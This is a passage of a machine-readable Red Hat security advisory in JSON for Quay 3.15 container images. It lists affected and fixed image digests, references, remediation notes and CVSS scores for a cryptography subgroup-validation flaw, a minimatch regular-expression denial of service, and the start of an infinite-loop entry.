"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-26007"
},
{
"category": "external",
"summary": "RHBZ#2438762",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438762"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-26007",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-26007"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-26007",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26007"
},
{
"category": "external",
"summary": "https://github.com/pyca/cryptography/commit/0eebb9dbb6343d9bc1d91e5a2482ed4e054a6d8c",
"url": "https://github.com/pyca/cryptography/commit/0eebb9dbb6343d9bc1d91e5a2482ed4e054a6d8c"
},
{
"category": "external",
"summary": "https://github.com/pyca/cryptography/security/advisories/GHSA-r6ph-v2qm-q3c2",
"url": "https://github.com/pyca/cryptography/security/advisories/GHSA-r6ph-v2qm-q3c2"
}
],
"release_date": "2026-02-10T21:42:56.471000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-03T22:07:28+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6568"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "cryptography: cryptography Subgroup Attack Due to Missing Subgroup Validation for SECT Curves"
},
{
"cve": "CVE-2026-26996",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2026-02-20T04:01:11.896063+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2441268"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in minimatch. A remote attacker could exploit this Regular Expression Denial of Service (ReDoS) vulnerability by providing a specially crafted glob pattern. This pattern, containing numerous consecutive wildcard characters, causes excessive processing and exponential backtracking in the regular expression engine. Successful exploitation leads to a Denial of Service (DoS), making the application unresponsive.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "minimatch: minimatch: Denial of Service via specially crafted glob patterns",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Exploitation of this flaw requires that a user or service processes untrusted input.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"known_not_affected": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-26996"
},
{
"category": "external",
"summary": "RHBZ#2441268",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2441268"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-26996",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-26996"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-26996",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26996"
},
{
"category": "external",
"summary": "https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5",
"url": "https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5"
},
{
"category": "external",
"summary": "https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26",
"url": "https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26"
}
],
"release_date": "2026-02-20T03:05:21.105000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-03T22:07:28+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6568"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "minimatch: minimatch: Denial of Service via specially crafted glob patterns"
},
{
"cve": "CVE-2026-27628",
"cwe": {
"id": "CWE-835",
"name": "Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)"
},
"discovery_date": "2026-02-25T04:02:09.864561+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
